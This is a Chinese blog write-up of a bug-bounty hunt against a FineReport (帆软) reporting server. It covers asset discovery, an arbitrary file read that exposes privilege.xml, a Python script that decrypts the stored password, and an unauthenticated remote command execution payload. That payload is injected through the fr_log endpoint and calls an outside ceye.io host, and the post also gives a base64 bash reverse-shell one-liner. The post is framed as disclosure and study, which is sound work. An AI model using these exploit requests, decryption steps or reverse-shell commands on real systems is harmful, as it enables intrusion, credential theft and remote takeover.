美文网首页
【网络安全】一次SRC挖掘经历

【网络安全】一次SRC挖掘经历

作者: H_00c8 | 来源:发表于2022-03-30 17:11 被阅读0次

本文仅供网络安全学习研究,违F绕路

资产发现

首先是信息收集子域名,谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。

[图片上传失败...(image-af890a-1648628996029)]

我点击电信、网通、自动的时候,发现域名跳转到了真实IP

[图片上传失败...(image-f1d08e-1648628996029)]

这样,就可以对真实IP进行端口扫描->目录扫描一把梭了,发现在8080端口发现ReportServe部署页面。

[图片上传失败...(image-7013b4-1648628996029)]

接着就对帆软的历史漏洞进行测试了。

任意文件读取获取密码解密登录后台

view-source:http://xxx.xxx.xxx.xxx:8080/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

刚开始的时候是空白页,查看源代码才发现信息

[图片上传失败...(image-8c3b9e-1648628996029)]

可以看到用户为posun,密码需要解密一下

解密脚本:

cipher = '___0022007c0039003b005100e3' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
    Password = Password + chr(c2)
print (Password)

解密得到123456,问题是拿到哪里登录呢,突然想到刚才有个数据决策系统,拿去登录刚才的数据决策系统.

[图片上传失败...(image-9dc100-1648628996029)]

成功进入后台,然而高兴的太早了,因为该站长注册码到期了,且没有什么敏感信息。SRC也是反馈危害性不大,不能收,没办法,只能另寻途径了。

【相关技术学习文档】

帆软报表FineRePort未授权远程命令执行漏洞

影响版本:

    • 帆软报表 FineRePortv8.0
    • 帆软报表 FineRePortv9.0
xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin

这个接口 打开 点查询 burp拦截数据包 替换post的内容

__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR "com.fr.chart.phantom.system.SystemServiceUtils.exeCmd";CALL RUMCMD('curl http://uki7s7.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}

便操作了一下,前提是需要得知用户名

漏洞地址:http://xxx.xxx.xxx.xxx:8080/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=posun,这里需要把username改为刚刚的用户名。

[图片上传失败...(image-4fb9c6-1648628996029)]

点击查询抓包改包,这里先是简单的ceye回显,改包后一直forward

[图片上传失败...(image-afa87-1648628996029)]

[图片上传失败...(image-171ea0-1648628996029)]

可以看到,我的ceye收到回显,说明该漏洞是存在的,为了证明危害性,我后面继续了反弹shell操作

bash -c {echo,base64编码}|{base64,-d}|{bash,-i}

VPS监听7777端口,如图下 反弹shell成功

[图片上传失败...(image-5ee7ee-1648628996029)]

备注:刚开始对面审核SRC愣是死活复现不出来,手把手教学了,这里有几个问题注意下,查询不能太频繁 容易并发数满,需要等一段时间,我后面第二天并发数才清空.

总结

  • 多观察细节,比如刚刚的真实IP就冒出来了
  • 遇到危害性不大漏洞不要慌,留着还能组合其它的漏洞.

相关文章

  • 【网络安全】一次SRC挖掘经历

    本文仅供网络安全学习研究,违F绕路 资产发现 首先是信息收集子域名,谷歌语句直接site:xxx.com[site...

  • SRC漏洞挖掘捡漏经验

    为保障自身产品和业务的安全,进一步提升安全防护能力,诸多厂商上线应急安全中心,网安爱好者可通过其平台提交漏洞,也因...

  • SRC漏洞挖掘思路与技巧

    [信息收集] 所谓万事开头难。 对于我个人来言,在决定认认真真挖掘一家厂商漏洞时,刚开始最难的就是信息收集,这是耗...

  • 小白怎么快速挖掘SRC漏洞

    交流Q群:754033104 前言 国家在注重安全行业,越来越多的SRC(安全响应中心)成立。在各大平台,比如漏洞...

  • 关于SRC资源的记录

    最近一直想搞一波SRC,所以我就把我收集的SRC的信息都保存一下,以方便之后的挖掘。 1. SRC合集 百度安全应...

  • Isolation Forest

    摘要:iForest用于挖掘异常数据,如网络安全中的攻击检测和流量异常分析,金融机构则用于挖掘出欺诈行为。算法对内...

  • 0x14 异常挖掘,Isolation Forest

    摘要:iForest用于挖掘异常数据,如网络安全中的攻击检测和流量异常分析,金融机构则用于挖掘出欺诈行为。算法对内...

  • 风控不能全靠人工-天御在手风控无忧

    网络安全覆盖面广,往深度挖掘也可以到很深的领域。所以网络安全不仅仅局限于网络攻击的防护和数据安全的保护,在风控方面...

  • 图片懒加载

    原理:当img标签中有src时,它就会试图去加载src中的内容,实现一次请求。而我们不再img中写src,而是da...

  • SRC漏洞挖掘信息收集之子域名收集(一)

    一、子域名介绍 1.1 什么是子域名? 子域名级别:域名按照层级可以分为顶级域、根域名、子域名等 。例如.com ...

网友评论

      本文标题:【网络安全】一次SRC挖掘经历

      本文链接:https://www.haomeiwen.com/subject/iuqwjrtx.html